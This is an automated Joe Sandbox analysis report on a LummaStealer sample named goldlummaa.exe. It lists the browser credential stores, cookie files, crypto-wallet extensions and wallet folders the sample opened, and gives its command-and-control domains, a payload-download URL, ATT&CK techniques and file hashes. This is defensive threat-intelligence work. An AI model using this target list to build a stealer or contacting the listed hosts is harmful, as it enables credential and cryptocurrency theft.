                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\Desktop\goldlummaa.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                    Source: C:\Users\user\Desktop\goldlummaa.exe Directory queried: C:\Users\user\Documents\AFWAAFRXKO
                    Source: Yara match, File source: 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, File source: Process Memory Space: goldlummaa.exe PID: 7460, type: MEMORYSTR
                    Source: Yara match, File source: 3.2.goldlummaa.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 3.2.goldlummaa.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 12 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 211 Process Injection | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 12 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | 2 Clipboard Data | 124 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    Source | Detection | Scanner | Label | Link
                    goldlummaa.exe | 79% | ReversingLabs | Win32.Trojan.LummaStealer |
                    goldlummaa.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://185.215.113.16/off/def.exeL | 0% | Avira URL Cloud | safe |
                    https://tacitglibbr.biz/e | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/h | 100% | Avira URL Cloud | malware |
                    http://185.215.113.16/off/def.exe1dO | 0% | Avira URL Cloud | safe |
                    http://185.215.113.16/n | 0% | Avira URL Cloud | safe |
                    https://tacitglibbr.biz/s | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/al6 | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/api. | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/perati | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/int16C | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/rs. | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz// | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/. | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/apiX | 100% | Avira URL Cloud | malware |
                    https://tacitglibbr.biz/5nascr | 100% | Avira URL Cloud | malware |
                    http://185.215.113.16/wU | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    tacitglibbr.biz | 104.21.50.161 | true | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    sordid-snaked.cyou | false | | high
                    deafeninggeh.biz | false | | high
                    tacitglibbr.biz | false | | high
                    diffuculttan.xyz | false | | high
                    effecterectz.xyz | false | | high
                    wrathful-jammy.cyou | false | | high
                    awake-weaves.cyou | false | | high
                    immureprech.biz | false | | high
                    https://tacitglibbr.biz/api | false | | high
                    debonairnukk.xyz | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                https://tacitglibbr.biz/.goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://185.215.113.16/goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://tacitglibbr.biz//goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://185.215.113.16/Cgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://tacitglibbr.biz/apiXgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.215.113.16/wUgoldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://tacitglibbr.biz/5nascrgoldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://185.215.113.16/off/def.exegoldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://tacitglibbr.biz:443/apigoldlummaa.exe, 00000003.00000003.1401845201.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.50.161 | tacitglibbr.biz | United States | 13335 | CLOUDFLARENETUS | false
185.215.113.16 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577492
Start date and time:2024-12-18 14:16:41 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 40s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:goldlummaa.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@6/9@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 42
• Number of non-executed functions: 106
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.63, 4.245.163.56, 20.231.128.67
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: goldlummaa.exe
Time | Type | Description
08:17:39 | API Interceptor | 8x Sleep call for process: goldlummaa.exe modified
08:18:42 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.006881471647875
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:nh/pmB0JsAnbcA6afjGnty0zuiFXZ24IO8W5:JpTJsAnbcAvjSzuiFXY4IO8w
                                                                                                                MD5:884C0E70DA6539F9BDF4EB2C0B693D38
                                                                                                                SHA1:9964C45242BBF552739190A80F09A25C992BA1CD
                                                                                                                SHA-256:ADB33022F06ADE0B12024591CC965EE8A0751AFCC997DDD6C2743E79A6AF31C5
                                                                                                                SHA-512:684D617D8529662EBF7A13E920DC6151931843EBC256EA6FC6A880EF7B695A7278EEA0924EFDF2736C91E9CD882DC262A9E81A378D5B9E0A3D78CF6BB1A792FA
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                 Preview:Version=1 EventType=APPCRASH EventTime=133790014976772129 ReportType=2 Consent=1 UploadTime=133790014982397052 ReportStatus=524384 ReportIdentifier=15f18844-a35f-49e7-aa40-f8d67b0e0603 IntegratorReportIdentifier=1cdf3c04-0fd9-4c7a-93f0-3a59724749d8 Wow64Host=34404 Wow64Guest=332 NsAppName=goldlummaa.exe AppSessionGuid=00001d24-0001-0014-8157-01354f51db01 TargetAppId=W:00063284c24020f5d7f59b717ce242cbabbb0000ffff!0000ecb0c0cd486733491804a05cf387f2d04d5e2279!goldlummaa.exe TargetApp
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.0070581367041216
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:lT0/qmb0bgi5afjGnty0zuiFXZ24IO8W5:REqpbgiajSzuiFXY4IO8w
                                                                                                                MD5:C194B79B25DF70E57C2A8E65A5292D0B
                                                                                                                SHA1:541CA2D42E3DFEC2539565873F526F92A85CEDD6
                                                                                                                SHA-256:3A09880B97FCB27E2166CC954094516A597B85EB5100090974CD9588E8D832F4
                                                                                                                SHA-512:A1BA0773A9E72D13A32DAA319C1A186C21BE1C6265AECFC59423A3ED028DE6881F230B0883063B7FCE29B9C6AE6B9B15EF7286E6F5E88A5D8339E115C2FCE0DA
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                 Preview:Version=1 EventType=APPCRASH EventTime=133790015229078645 ReportType=2 Consent=1 UploadTime=133790015233766186 ReportStatus=524384 ReportIdentifier=5dea5a10-5a37-4da8-81c8-6009ea7d7f5b IntegratorReportIdentifier=c9dfa500-6273-45c9-9a4e-b655d5022040 Wow64Host=34404 Wow64Guest=332 NsAppName=goldlummaa.exe AppSessionGuid=00001d24-0001-0014-8157-01354f51db01 TargetAppId=W:00063284c24020f5d7f59b717ce242cbabbb0000ffff!0000ecb0c0cd486733491804a05cf387f2d04d5e2279!goldlummaa.exe TargetApp
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4623
                                                                                                                Entropy (8bit):4.474625275770936
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zsNJg77aI9alWpW8VYbYm8M4JM505T9/JOqFC+q8P5PUg9O8QO5vz25v3:uIjfnI7oU7VLJlJe38nQozg5d
                                                                                                                MD5:10D6F89DD5328DFA5C10FB8873F3C601
                                                                                                                SHA1:D16C6C107B37BB16FA7DADAB60BC5798EAF5F8DF
                                                                                                                SHA-256:4DD2DEB74A247E2120AC97A374E92CAD9F45908C5693647098A6C81C61C01D4C
                                                                                                                SHA-512:09D4D00E98360E1F3E14429930FDA3E32532AABB02DC1996E3AAF3B60A436E1D8B74AC1B6F7FD9D331B4BDA1E26CCAAD6EAE9C749B3C9B2A8A956DA5C1B4F4D4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                 Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="636741" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 13:18:17 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):126132
                                                                                                                Entropy (8bit):1.9580412276950816
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:zeOC481Br1J9wvxlSnYOeLAkvXqe3q+Ftmwe3xwDNpVoMPVqmhN:DM1B5Pn7wqOq+uf+NY83hN
                                                                                                                MD5:2999BC23D052874697424FA00DD6358B
                                                                                                                SHA1:8BF575028CA9ACBB3F441EF5AF87EDDAE0B2A8FF
                                                                                                                SHA-256:54DD07C4D1BF71053A6AA49F08FDC74751307E62B939C53CB9D2AD3E7ACC3B22
                                                                                                                SHA-512:A1B6728583DA133AD8ECA68B62142BDDEB0DDED48518FD36DEB1A7BB0344477BDA5F572F1E99E49E7BD5CEE7A93DE450EE45DD13EA39992E6AC98B8DB7B91A09
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                 Preview:MDMP [binary data] GenuineIntel [binary data] Eastern Standard Time [binary data] Eastern Summer Time [binary data] 19041.1.amd64fre.vb_release.191206-1406 [binary data]
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6362
                                                                                                                Entropy (8bit):3.7241942884437047
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:R6l7wVeJdf6IPYWzaAjAsprr89bRKsf7bm:R6lXJF6IPYQaAjAdRpfm
                                                                                                                MD5:BC25446AB6C953CA4A457C9B979D0226
                                                                                                                SHA1:B3FB1E893C7D6B018C8ECA55E2C44C37D3A25751
                                                                                                                SHA-256:797656B3CF27D4E816F15C25C3556A9C9D9092A7956DF573A84EF1C223695ECE
                                                                                                                SHA-512:D2B7CD41BFE37B92B0C011B3214FE0572F4862049065A9D89CD352BD282426BF281EE4DE5E4421E1D731CF713D371EC0F1F4C9634E12CE0665C37989CF9696D7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
